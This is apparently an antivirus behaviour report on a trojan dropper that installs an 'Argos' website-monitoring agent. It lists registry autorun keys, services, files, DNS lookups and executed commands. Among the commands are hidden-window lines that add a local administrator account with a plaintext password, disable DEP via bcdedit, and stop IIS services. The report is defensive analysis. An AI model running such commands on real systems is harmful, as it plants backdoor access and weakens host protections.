Trojan.MulDrop11.17817

Technical Information

To ensure autorun and distribution

Modifies the following registry keys

[<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce] '{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}' = '"%ALLUSERSPROFILE%\Application Data\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\v...
[<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce] '{01db25f3-1b76-4d97-88c8-1c90634d88fb}' = '"%ALLUSERSPROFILE%\Application Data\Package Cache\{01db25f3-1b76-4d97-88c8-1c90634d88fb}\v...
[<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce] '{615bc16d-60f5-482e-91b3-b51d8130963b}' = '"%ALLUSERSPROFILE%\Application Data\Package Cache\{615bc16d-60f5-482e-91b3-b51d8130963b}\v...

Creates the following services

[<HKLM>\System\CurrentControlSet\Services\WebSiteMonitorManagerService] 'Start' = '00000002'
[<HKLM>\System\CurrentControlSet\Services\WebSiteMonitorManagerService] 'ImagePath' = 'C:\Argos\Agent\Win\WebSiteMonitorManager.exe'
[<HKLM>\System\CurrentControlSet\Services\WebSiteMonitorWatcherService] 'Start' = '00000002'
[<HKLM>\System\CurrentControlSet\Services\WebSiteMonitorWatcherService] 'ImagePath' = 'C:\Argos\Agent\Win\WebSiteMonitorWatcher.exe'
[<HKLM>\System\CurrentControlSet\Services\WebSiteMonitorWebService] 'Start' = '00000002'
[<HKLM>\System\CurrentControlSet\Services\WebSiteMonitorWebService] 'ImagePath' = 'C:\Argos\Agent\Win\WebSiteMonitorWebService.exe'

Modifies file system

Creates the following files

%TEMP%\nsc2.tmp\nsscm.dll
%TEMP%\nsc2.tmp\ns12.tmp
%TEMP%\nsc2.tmp\ns13.tmp
%TEMP%\nsc2.tmp\ns14.tmp
%TEMP%\nsc2.tmp\ns15.tmp
%TEMP%\nsc2.tmp\ns16.tmp
%TEMP%\nsc2.tmp\ns17.tmp
%TEMP%\nsc2.tmp\ns21.tmp
%TEMP%\nsc2.tmp\ns18.tmp
%TEMP%\nsc2.tmp\ns1a.tmp
%TEMP%\nsc2.tmp\ns1b.tmp
%TEMP%\nsc2.tmp\ns1c.tmp
%TEMP%\nsc2.tmp\ns1d.tmp
%TEMP%\nsc2.tmp\ns1e.tmp
%TEMP%\nsc2.tmp\ns1f.tmp
%TEMP%\nsc2.tmp\ns10.tmp
%TEMP%\nsc2.tmp\ns11.tmp
%TEMP%\nsc2.tmp\ns19.tmp
%TEMP%\nsc2.tmp\ns20.tmp
%TEMP%\nsc2.tmp\nsd.tmp
%TEMP%\{615bc16d-60f5-482e-91b3-b51d8130963b}\.ba1\wixstdba.dll
%TEMP%\{615bc16d-60f5-482e-91b3-b51d8130963b}\.ba1\thm.xml
%TEMP%\{615bc16d-60f5-482e-91b3-b51d8130963b}\.ba1\thm.wxl
%TEMP%\{615bc16d-60f5-482e-91b3-b51d8130963b}\.ba1\logo.png
%TEMP%\{615bc16d-60f5-482e-91b3-b51d8130963b}\.ba1\license.rtf
%TEMP%\{615bc16d-60f5-482e-91b3-b51d8130963b}\.ba1\bootstrapperapplicationdata.xml
%TEMP%\dd_vcredist_x86_20190930235701.log
%TEMP%\nsc2.tmp\ns7.tmp
%TEMP%\nsc2.tmp\ns8.tmp
%TEMP%\nsc2.tmp\ns9.tmp
%TEMP%\nsc2.tmp\nsa.tmp
%TEMP%\nsc2.tmp\nsb.tmp
%TEMP%\nsc2.tmp\nsc.tmp
%TEMP%\nsc2.tmp\nse.tmp
%TEMP%\{01db25f3-1b76-4d97-88c8-1c90634d88fb}\.ba1\bootstrapperapplicationdata.xml
%TEMP%\nsc2.tmp\nsf.tmp
C:\argos\agent\win\log4net.xml
%TEMP%\nsc2.tmp\ns22.tmp
%WINDIR%\temp\mez0fdhn.cmdline
%WINDIR%\temp\csc2d.tmp
%WINDIR%\temp\res2e.tmp
%WINDIR%\temp\mez0fdhn.dll
%WINDIR%\temp\ia3uvj1g.0.cs
%WINDIR%\temp\ia3uvj1g.cmdline
%WINDIR%\temp\ia3uvj1g.out
%TEMP%\nsc2.tmp\ns23.tmp
%WINDIR%\temp\csc2f.tmp
%WINDIR%\temp\ia3uvj1g.dll
%WINDIR%\temp\gmgo1kr3.0.cs
%WINDIR%\temp\gmgo1kr3.cmdline
%WINDIR%\temp\gmgo1kr3.out
%WINDIR%\temp\csc31.tmp
%WINDIR%\temp\mez0fdhn.0.cs
%WINDIR%\temp\fzbxfftq.dll
%WINDIR%\temp\mez0fdhn.out
%WINDIR%\temp\res2c.tmp
%WINDIR%\temp\csc2b.tmp
%TEMP%\nsc2.tmp\ns24.tmp
%TEMP%\nsc2.tmp\ns26.tmp
%TEMP%\nsc2.tmp\execcmd.dll
%TEMP%\aspnetsetup_00001.log
%TEMP%\rgi27.tmp
%TEMP%\rgi28.tmp
%TEMP%\{01db25f3-1b76-4d97-88c8-1c90634d88fb}\.ba1\license.rtf
%TEMP%\rgi29.tmp
%TEMP%\dd_vcredist_x86_20190930235654.log
%WINDIR%\microsoft.net\framework\v2.0.50727\config\wsf2a.tmp
C:\argos\agent\logs\websitemonitormanager.exe.log
C:\argos\agent\logs\websitemonitorwatcher.exe.log
%WINDIR%\temp\fzbxfftq.0.cs
%WINDIR%\temp\fzbxfftq.cmdline
%WINDIR%\temp\fzbxfftq.out
<SYSTEM32>\perfstringbackup.tmp
%TEMP%\nsc2.tmp\ns25.tmp
C:\argos\agent\logs\websitemonitorwebservice.exe.log
%TEMP%\{01db25f3-1b76-4d97-88c8-1c90634d88fb}\.ba1\logo.png
%TEMP%\{01db25f3-1b76-4d97-88c8-1c90634d88fb}\.ba1\thm.wxl
%TEMP%\{01db25f3-1b76-4d97-88c8-1c90634d88fb}\.ba1\thm.xml
C:\argos\agent\win\websitemonitor.win.dll
C:\argos\agent\win\websitemonitor.win.v2.dll
C:\argos\agent\win\websitemonitor.browserwin.dll
C:\argos\agent\win\websitemonitor.browserwin2014.dll
C:\argos\agent\win\websitemonitor.systemmonitor.dll
C:\argos\agent\win\websitemonitor.bandwitdhperf.dll
C:\argos\agent\win\websitemonitor.unitinfoclient.dll
C:\argos\agent\win\websitemonitor.unitinfoclient.xmlserializers.dll
C:\argos\agent\win\websitemonitor.watcher.dll
C:\argos\agent\win\websitemonitor.json.dll
C:\argos\agent\win\capturefail.jpg
C:\argos\agent\win\notavailablediskfreespace.jpg
C:\argos\agent\win\initializeobject.html
C:\argos\agent\win\websitemonitor.measurelistmanagerservice.dll
C:\argos\agent\win\websitemonitor.utilsbsl.dll
C:\argos\agent\win\websitemonitor.hookinjection.dll
C:\argos\agent\win\websitemonitor.win32apibsl.dll
C:\argos\agent\win\websitemonitor.collectmanagerbsl.dll
C:\argos\agent\win\websitemonitorrenderviewhelper.exe
C:\argos\agent\win\websitemonitorconfigure.exe
C:\argos\agent\win\websitemonitoragent.exe
C:\argos\agent\win\websitemonitoragent.test.exe
C:\argos\agent\win\websitemonitoragent.v2.exe
C:\argos\agent\win\websitemonitoragent.v2.test.exe
C:\argos\agent\win\websitemonitormanager.exe
C:\argos\agent\win\managedprobelist.json
%WINDIR%\temp\res32.tmp
C:\argos\agent\win\websitemonitorwatcher.exe
C:\argos\agent\win\websitemonitorwebservice.exe
C:\argos\agent\win\websitemonitor.argoscallservice.dll
C:\argos\agent\win\websitemonitor.transactionjobbsl.dll
C:\argos\agent\win\websitemonitor.webserviceclientbsl.dll
C:\argos\agent\win\websitemonitor.webserviceclientbsl.xmlserializers.dll
C:\argos\agent\win\websitemonitor.collectbsl.dll
%TEMP%\nsc2.tmp\processes.dll
C:\argos\agent\win\websitemonitorscreeshotbackup.exe
%WINDIR%\temp\res30.tmp
C:\argos\agent\win\websitemonitorwatcher.exe.config
C:\argos\agent\win\websitemonitorwebservice.exe.8080.config
%TEMP%\nsc2.tmp\nsexec.dll
%TEMP%\nsc2.tmp\ns3.tmp
%TEMP%\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\.ba1\wixstdba.dll
%TEMP%\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\.ba1\thm.xml
%TEMP%\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\.ba1\thm.wxl
C:\argos\agent\win\websitemonitor.version.dll
%TEMP%\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\.ba1\logo.png
%TEMP%\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\.ba1\bootstrapperapplicationdata.xml
%TEMP%\dd_vcredist_x86_20190930235646.log
%TEMP%\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\.be\vcredist_x86.exe
%ALLUSERSPROFILE%\application data\package cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe
%ALLUSERSPROFILE%\application data\package cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\state.rsm
%TEMP%\{01db25f3-1b76-4d97-88c8-1c90634d88fb}\.ba1\wixstdba.dll
C:\argos\agent\win\tracetcp.exe
%TEMP%\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\.ba1\license.rtf
C:\argos\agent\utils\vcredist_x86_v110.exe
C:\argos\agent\utils\gacutil.exe
C:\argos\agent\win\screenshotbackup.json
C:\argos\agent\win\system.web.http.xml
C:\argos\agent\win\websitemonitorwebservice.exe.8000.config
C:\argos\agent\win\newtonsoft.json.dll
C:\argos\agent\win\jsonexserializer.dll
C:\argos\agent\win\microsoft.mshtml.dll
C:\argos\agent\win\interop.shdocvw.dll
C:\argos\agent\win\websitemonitormanager.exe.config
C:\argos\agent\win\log4net.dll
C:\argos\agent\win\websitemonitorwebservice.exe.config
C:\argos\agent\win\system.net.http.dll
C:\argos\agent\win\system.net.http.webrequest.dll
C:\argos\agent\win\system.web.http.dll
C:\argos\agent\win\system.web.http.selfhost.dll
C:\argos\agent\win\system.web.http.selfhost.xml
C:\argos\agent\win\system.web.http.webhost.dll
C:\argos\agent\win\websitemonitorwebservice.exe.80.config
C:\argos\agent\win\system.web.http.webhost.xml
C:\argos\agent\win\system.net.http.formatting.dll
%WINDIR%\temp\gmgo1kr3.dll

Deletes the following files

%TEMP%\{615bc16d-60f5-482e-91b3-b51d8130963b}\.ba1\bootstrapperapplicationdata.xml
%WINDIR%\temp\res2c.tmp
%TEMP%\nsc2.tmp\processes.dll
%TEMP%\nsc2.tmp\nsscm.dll
%TEMP%\nsc2.tmp\nsexec.dll
%TEMP%\nsc2.tmp\execcmd.dll
C:\argos\agent\win\websitemonitorwebservice.exe.8080.config
C:\argos\agent\win\websitemonitorwebservice.exe.8000.config
C:\argos\agent\win\websitemonitorwebservice.exe.80.config
%TEMP%\nsc2.tmp\ns20.tmp
%WINDIR%\microsoft.net\framework\v2.0.50727\config\wsf2a.tmp
%TEMP%\rgi29.tmp
%TEMP%\rgi28.tmp
%TEMP%\rgi27.tmp
%TEMP%\nsc2.tmp\ns26.tmp
%TEMP%\nsc2.tmp\ns25.tmp
%TEMP%\nsc2.tmp\ns24.tmp
%TEMP%\nsc2.tmp\ns23.tmp
%TEMP%\nsc2.tmp\ns22.tmp
<SYSTEM32>\perfstringbackup.tmp
%TEMP%\nsc2.tmp\ns21.tmp
%WINDIR%\temp\csc2b.tmp
%WINDIR%\temp\res30.tmp
%WINDIR%\temp\gmgo1kr3.0.cs
%WINDIR%\temp\gmgo1kr3.out
%WINDIR%\temp\csc31.tmp
%WINDIR%\temp\res32.tmp
%WINDIR%\temp\ia3uvj1g.out
%WINDIR%\temp\ia3uvj1g.dll
%WINDIR%\temp\ia3uvj1g.0.cs
%WINDIR%\temp\ia3uvj1g.cmdline
%WINDIR%\temp\fzbxfftq.dll
%WINDIR%\temp\fzbxfftq.0.cs
%WINDIR%\temp\mez0fdhn.dll
%WINDIR%\temp\mez0fdhn.0.cs
%WINDIR%\temp\mez0fdhn.cmdline
%WINDIR%\temp\mez0fdhn.out
%WINDIR%\temp\csc2d.tmp
%WINDIR%\temp\res2e.tmp
%WINDIR%\temp\fzbxfftq.cmdline
%WINDIR%\temp\fzbxfftq.out
%WINDIR%\temp\csc2f.tmp
%TEMP%\nsc2.tmp\ns1f.tmp
%TEMP%\nsc2.tmp\ns1e.tmp
%TEMP%\nsc2.tmp\ns1d.tmp
%TEMP%\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\.ba1\thm.xml
%TEMP%\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\.ba1\thm.wxl
%TEMP%\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\.ba1\logo.png
%TEMP%\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\.ba1\license.rtf
%TEMP%\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\.ba1\bootstrapperapplicationdata.xml
%TEMP%\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\.be\vcredist_x86.exe
%TEMP%\{01db25f3-1b76-4d97-88c8-1c90634d88fb}\.ba1\wixstdba.dll
%TEMP%\nsc2.tmp\ns3.tmp
%TEMP%\{01db25f3-1b76-4d97-88c8-1c90634d88fb}\.ba1\thm.xml
%TEMP%\{01db25f3-1b76-4d97-88c8-1c90634d88fb}\.ba1\logo.png
%TEMP%\{01db25f3-1b76-4d97-88c8-1c90634d88fb}\.ba1\license.rtf
%TEMP%\{01db25f3-1b76-4d97-88c8-1c90634d88fb}\.ba1\bootstrapperapplicationdata.xml
%TEMP%\{615bc16d-60f5-482e-91b3-b51d8130963b}\.ba1\wixstdba.dll
%TEMP%\{615bc16d-60f5-482e-91b3-b51d8130963b}\.ba1\thm.xml
%TEMP%\{615bc16d-60f5-482e-91b3-b51d8130963b}\.ba1\thm.wxl
%TEMP%\{615bc16d-60f5-482e-91b3-b51d8130963b}\.ba1\logo.png
%TEMP%\{615bc16d-60f5-482e-91b3-b51d8130963b}\.ba1\license.rtf
%TEMP%\{01db25f3-1b76-4d97-88c8-1c90634d88fb}\.ba1\thm.wxl
%TEMP%\nsc2.tmp\ns7.tmp
%TEMP%\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\.ba1\wixstdba.dll
%TEMP%\nsc2.tmp\ns8.tmp
%TEMP%\nsc2.tmp\ns1c.tmp
%TEMP%\nsc2.tmp\ns13.tmp
%TEMP%\nsc2.tmp\ns1b.tmp
%TEMP%\nsc2.tmp\ns1a.tmp
%TEMP%\nsc2.tmp\ns19.tmp
%TEMP%\nsc2.tmp\ns18.tmp
%TEMP%\nsc2.tmp\ns17.tmp
%TEMP%\nsc2.tmp\ns16.tmp
%TEMP%\nsc2.tmp\ns15.tmp
%TEMP%\nsc2.tmp\ns14.tmp
%TEMP%\nsc2.tmp\ns12.tmp
%TEMP%\nsc2.tmp\ns9.tmp
%TEMP%\nsc2.tmp\ns11.tmp
%TEMP%\nsc2.tmp\ns10.tmp
%TEMP%\nsc2.tmp\nsf.tmp
%TEMP%\nsc2.tmp\nse.tmp
%TEMP%\nsc2.tmp\nsd.tmp
%TEMP%\nsc2.tmp\nsc.tmp
%TEMP%\nsc2.tmp\nsb.tmp
%TEMP%\nsc2.tmp\nsa.tmp
%WINDIR%\temp\gmgo1kr3.cmdline
%WINDIR%\temp\gmgo1kr3.dll

Network activity

UDP

DNS ASK ar####gr.vivans.net
DNS ASK un#####ager.vivans.net

Miscellaneous

Creates and executes the following

'%TEMP%\nsc2.tmp\ns3.tmp' "C:\Argos\Agent\Utils\vcredist_x86_v110.exe" /passive
'C:\argos\agent\utils\gacutil.exe' /if "C:\Argos\Agent\Win\WebSiteMonitor.SystemMonitor.dll"
'%TEMP%\nsc2.tmp\ns1d.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /if "C:\Argos\Agent\Win\WebSiteMonitor.CollectBSL.dll"
'%TEMP%\nsc2.tmp\ns1c.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /if "C:\Argos\Agent\Win\WebSiteMonitor.WebserviceClientBSL.XmlSerializers.dll"
'C:\argos\agent\utils\gacutil.exe' /if "C:\Argos\Agent\Win\WebSiteMonitor.WebserviceClientBSL.dll"
'%TEMP%\nsc2.tmp\ns1b.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /if "C:\Argos\Agent\Win\WebSiteMonitor.WebserviceClientBSL.dll"
'%TEMP%\nsc2.tmp\ns1a.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /if "C:\Argos\Agent\Win\WebSiteMonitor.TransactionJobBSL.dll"
'C:\argos\agent\utils\gacutil.exe' /if "C:\Argos\Agent\Win\WebSiteMonitor.WIN.dll"
'%TEMP%\nsc2.tmp\ns19.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /if "C:\Argos\Agent\Win\WebSiteMonitor.WIN.dll"
'C:\argos\agent\utils\gacutil.exe' /if "C:\Argos\Agent\Win\WebSiteMonitor.CollectBSL.dll"
'C:\argos\agent\utils\gacutil.exe' /if "C:\Argos\Agent\Win\WebSiteMonitor.BrowserWIN2014.dll"
'C:\argos\agent\utils\gacutil.exe' /if "C:\Argos\Agent\Win\WebSiteMonitor.BrowserWIN.dll"
'%TEMP%\nsc2.tmp\ns17.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /if "C:\Argos\Agent\Win\WebSiteMonitor.BrowserWIN.dll"
'C:\argos\agent\utils\gacutil.exe' /u "WebSiteMonitor.UnitInfoClient.XmlSerializers"
'%TEMP%\nsc2.tmp\ns16.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /u "WebSiteMonitor.UnitInfoClient.XmlSerializers"
'C:\argos\agent\utils\gacutil.exe' /u "WebSiteMonitor.UnitInfoClient"
'%TEMP%\nsc2.tmp\ns23.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /if "C:\Argos\Agent\Win\WebSiteMonitor.BandwitdhPerf.dll"
'%TEMP%\nsc2.tmp\ns15.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /u "WebSiteMonitor.UnitInfoClient"
'%TEMP%\nsc2.tmp\ns14.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /u "WebSiteMonitor.ArgosCallService"
'C:\argos\agent\win\websitemonitorwebservice.exe'
'%TEMP%\nsc2.tmp\ns18.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /if "C:\Argos\Agent\Win\WebSiteMonitor.BrowserWIN2014.dll"
'C:\argos\agent\utils\gacutil.exe' /u "WebSiteMonitor.BandwitdhPerf"
'%TEMP%\nsc2.tmp\ns1f.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /if "C:\Argos\Agent\Win\WebSiteMonitor.Win32APIBSL.dll"
'C:\argos\agent\win\websitemonitorwatcher.exe'
'C:\argos\agent\win\websitemonitormanager.exe'
'C:\argos\agent\utils\gacutil.exe' /if "C:\Argos\Agent\Win\WebSiteMonitor.WebserviceClientBSL.XmlSerializers.dll"
'%TEMP%\nsc2.tmp\ns24.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /if "C:\Argos\Agent\Win\WebSiteMonitor.UnitInfoClient.dllcd"
'%TEMP%\nsc2.tmp\ns26.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /if "C:\Argos\Agent\Win\WebSiteMonitor.ArgosCallService.dll"
'C:\argos\agent\utils\gacutil.exe' /if "C:\Argos\Agent\Win\WebSiteMonitor.UnitInfoClient.XmlSerializers.dll"
'%TEMP%\nsc2.tmp\ns25.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /if "C:\Argos\Agent\Win\WebSiteMonitor.UnitInfoClient.XmlSerializers.dll"
'C:\argos\agent\utils\gacutil.exe' /if "C:\Argos\Agent\Win\WebSiteMonitor.UnitInfoClient.dllcd"
'C:\argos\agent\utils\gacutil.exe' /if "C:\Argos\Agent\Win\WebSiteMonitor.UtilsBSL.dll"
'C:\argos\agent\utils\gacutil.exe' /u "WebSiteMonitor.ArgosCallService"
'C:\argos\agent\utils\gacutil.exe' /if "C:\Argos\Agent\Win\WebSiteMonitor.ArgosCallService.dll"
'%TEMP%\nsc2.tmp\ns11.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /u "WebSiteMonitor.CollectManagerBSL"
'%TEMP%\nsc2.tmp\ns1e.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /if "C:\Argos\Agent\Win\WebSiteMonitor.UtilsBSL.dll"
'%TEMP%\nsc2.tmp\ns12.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /u "WebSiteMonitor.SystemMonitor"
'%TEMP%\nsc2.tmp\ns21.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /if "C:\Argos\Agent\Win\WebSiteMonitor.CollectManagerBSL.dll"
'C:\argos\agent\utils\gacutil.exe' /if "C:\Argos\Agent\Win\WebSiteMonitor.MeasureListManagerService.dll"
'%TEMP%\nsc2.tmp\ns20.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /if "C:\Argos\Agent\Win\WebSiteMonitor.MeasureListManagerService.dll"
'C:\argos\agent\utils\gacutil.exe' /if "C:\Argos\Agent\Win\WebSiteMonitor.Win32APIBSL.dll"
'C:\argos\agent\utils\gacutil.exe' /if "C:\Argos\Agent\Win\WebSiteMonitor.BandwitdhPerf.dll"
'%TEMP%\nsc2.tmp\ns13.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /u "WebSiteMonitor.BandwitdhPerf"
'C:\argos\agent\utils\gacutil.exe' /if "C:\Argos\Agent\Win\WebSiteMonitor.TransactionJobBSL.dll"
'%TEMP%\nsc2.tmp\ns9.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /u "WebSiteMonitor.WIN"
'C:\argos\agent\utils\gacutil.exe' /u "WebSiteMonitor.TransactionJobBSL"
'C:\argos\agent\utils\gacutil.exe' /u "WebSiteMonitor.WebserviceClientBSL"
'%TEMP%\nsc2.tmp\nsc.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /u "WebSiteMonitor.WebserviceClientBSL.XmlSerializers"
'C:\argos\agent\utils\gacutil.exe' /u "WebSiteMonitor.WebserviceClientBSL.XmlSerializers"
'%TEMP%\nsc2.tmp\nsd.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /u "WebSiteMonitor.CollectBSL"
'%TEMP%\nsc2.tmp\ns22.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /if "C:\Argos\Agent\Win\WebSiteMonitor.SystemMonitor.dll"
'C:\argos\agent\utils\gacutil.exe' /u "WebSiteMonitor.WIN"
'C:\argos\agent\utils\gacutil.exe' /if "C:\Argos\Agent\Win\WebSiteMonitor.CollectManagerBSL.dll"
'%TEMP%\nsc2.tmp\nsa.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /u "WebSiteMonitor.TransactionJobBSL"
'%TEMP%\nsc2.tmp\nse.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /u "WebSiteMonitor.UtilsBSL"
'C:\argos\agent\utils\gacutil.exe' /u "WebSiteMonitor.CollectBSL"
'%TEMP%\nsc2.tmp\nsf.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /u "WebSiteMonitor.Win32APIBSL"
'%TEMP%\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\.be\vcredist_x86.exe' -q -burn.elevated BurnPipe.{39E6593D-B758-462D-9C95-C9406155CAFF} {88A5DFCC-1670-423E-8A49-734159BA0046} 3968
'C:\argos\agent\utils\gacutil.exe' /u "WebSiteMonitor.UtilsBSL"
'C:\argos\agent\utils\gacutil.exe' /u "WebSiteMonitor.Win32APIBSL"
'%TEMP%\nsc2.tmp\ns7.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /u "WebSiteMonitor.BrowserWIN"
'C:\argos\agent\utils\gacutil.exe' /u "WebSiteMonitor.CollectManagerBSL"
'C:\argos\agent\utils\gacutil.exe' /u "WebSiteMonitor.BrowserWIN2014"
'C:\argos\agent\utils\gacutil.exe' /u "WebSiteMonitor.BrowserWIN"
'C:\argos\agent\utils\vcredist_x86_v110.exe' /passive
'C:\argos\agent\utils\gacutil.exe' /u "WebSiteMonitor.MeasureListManagerService"
'%TEMP%\nsc2.tmp\ns8.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /u "WebSiteMonitor.BrowserWIN2014"
'%TEMP%\nsc2.tmp\ns10.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /u "WebSiteMonitor.MeasureListManagerService"
'%TEMP%\nsc2.tmp\nsb.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /u "WebSiteMonitor.WebserviceClientBSL"
'C:\argos\agent\utils\gacutil.exe' /u "WebSiteMonitor.SystemMonitor"
'<SYSTEM32>\cmd.exe' /C rmdir "C:\Argos\Agent\WebService\" /S /Q' (with hidden window)
'<SYSTEM32>\cmd.exe' /C sc create WebSiteMonitorWatcherService binPath= C:\Argos\Agent\Win\WebSiteMonitorWatcher.exe start= auto' (with hidden window)
'<SYSTEM32>\cmd.exe' /C netstat -an | FINDSTR /R /C:"8000[ ]*0.*LISTENING" > nul && ( echo 8000 > C:\Argos\Agent\Win\IISPORT.txt )' (with hidden window)
'<SYSTEM32>\cmd.exe' /C bcdedit.exe /set {current} nx AlwaysOff' (with hidden window)
'<SYSTEM32>\cmd.exe' /C del "C:\Argos\Agent\Win\WebSiteMonitorWebService.exe.*.config"' (with hidden window)
'<SYSTEM32>\cmd.exe' /C netstat -an | FINDSTR /R /C:"80[ ]*0.*LISTENING" > nul && ( echo 80 > C:\Argos\Agent\Win\IISPORT.txt )' (with hidden window)
'<SYSTEM32>\cmd.exe' /C copy "C:\Argos\Agent\Win\WebSiteMonitorWebService.exe.80.config" "C:\Argos\Agent\Win\WebSiteMonitorWebService.exe.config"' (with hidden window)
'<SYSTEM32>\cmd.exe' /C net user argos gksfutneh /ADD' (with hidden window)
'<SYSTEM32>\cmd.exe' /C %WINDIR%\Microsoft.NET\Framework\v2.0.50727\aspnet_regiis.exe -i' (with hidden window)
'<SYSTEM32>\cmd.exe' /C net localgroup administrators argos /ADD' (with hidden window)
'%WINDIR%\microsoft.net\framework\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%WINDIR%\TEMP\RES30.tmp" "%WINDIR%\Temp\CSC2F.tmp"' (with hidden window)
'%TEMP%\nsc2.tmp\ns1c.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /if "C:\Argos\Agent\Win\WebSiteMonitor.WebserviceClientBSL.XmlSerializers.dll"' (with hidden window)
'%TEMP%\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\.be\vcredist_x86.exe' -q -burn.elevated BurnPipe.{39E6593D-B758-462D-9C95-C9406155CAFF} {88A5DFCC-1670-423E-8A49-734159BA0046} 3968' (with hidden window)
'<SYSTEM32>\cmd.exe' /C netstat -an | FINDSTR /R /C:"8080[ ]*0.*LISTENING" > nul && ( echo 8080 > C:\Argos\Agent\Win\IISPORT.txt )' (with hidden window)
'<SYSTEM32>\cmd.exe' /C sc config IISADMIN start= disabled' (with hidden window)
'%WINDIR%\microsoft.net\framework\v4.0.30319\csc.exe' /noconfig /fullpaths @"%WINDIR%\TEMP\mez0fdhn.cmdline"' (with hidden window)
'%WINDIR%\microsoft.net\framework\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%WINDIR%\TEMP\RES2C.tmp" "%WINDIR%\Temp\CSC2B.tmp"' (with hidden window)
'%WINDIR%\microsoft.net\framework\v4.0.30319\csc.exe' /noconfig /fullpaths @"%WINDIR%\TEMP\fzbxfftq.cmdline"' (with hidden window)
'%TEMP%\nsc2.tmp\ns3.tmp' "C:\Argos\Agent\Utils\vcredist_x86_v110.exe" /passive' (with hidden window)
'<SYSTEM32>\cmd.exe' /C del "C:\Argos\Agent\Win\WebSiteMonitorAgent_Fail.exe"' (with hidden window)
'<SYSTEM32>\cmd.exe' /C sc stop IISADMIN' (with hidden window)
'<SYSTEM32>\cmd.exe' /C sc stop W3SVC' (with hidden window)
'<SYSTEM32>\cmd.exe' /C C:\Argos\Agent\Win\tracetcp www.vi##ns.net -n -t 100 -p 3 -F -m 30' (with hidden window)
'<SYSTEM32>\cmd.exe' /C sc create WebSiteMonitorWebService binPath= C:\Argos\Agent\Win\WebSiteMonitorWebService.exe start= auto type= interact type= own' (with hidden window)
'%TEMP%\nsc2.tmp\ns26.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /if "C:\Argos\Agent\Win\WebSiteMonitor.ArgosCallService.dll"' (with hidden window)
'<SYSTEM32>\cmd.exe' /C sc create WebSiteMonitorManagerService binPath= C:\Argos\Agent\Win\WebSiteMonitorManager.exe start= auto type= interact type= own' (with hidden window)
'<SYSTEM32>\cmd.exe' /C SETX /M IS_FOREGROUND_PROBE True' (with hidden window)
'%ALLUSERSPROFILE%\application data\package cache\{01db25f3-1b76-4d97-88c8-1c90634d88fb}\vcredist_x86.exe' -q -burn.elevated BurnPipe.{0A57685D-DEC6-431B-9177-E3587A2EF0FE} {C9702477-5503-4443-8107-A28112DAED8B} 4028' (with hidden window)
'<SYSTEM32>\cmd.exe' /C sc config W3SVC start= disabled' (with hidden window)
'%WINDIR%\microsoft.net\framework\v4.0.30319\csc.exe' /noconfig /fullpaths @"%WINDIR%\TEMP\ia3uvj1g.cmdline"' (with hidden window)
'%WINDIR%\microsoft.net\framework\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%WINDIR%\TEMP\RES2E.tmp" "%WINDIR%\Temp\CSC2D.tmp"' (with hidden window)
'%TEMP%\nsc2.tmp\nsa.tmp' "C:\Argos\Agent\Utils\Gacutil.exe" /u "WebSiteMonitor.TransactionJobBSL"' (with hidden window)
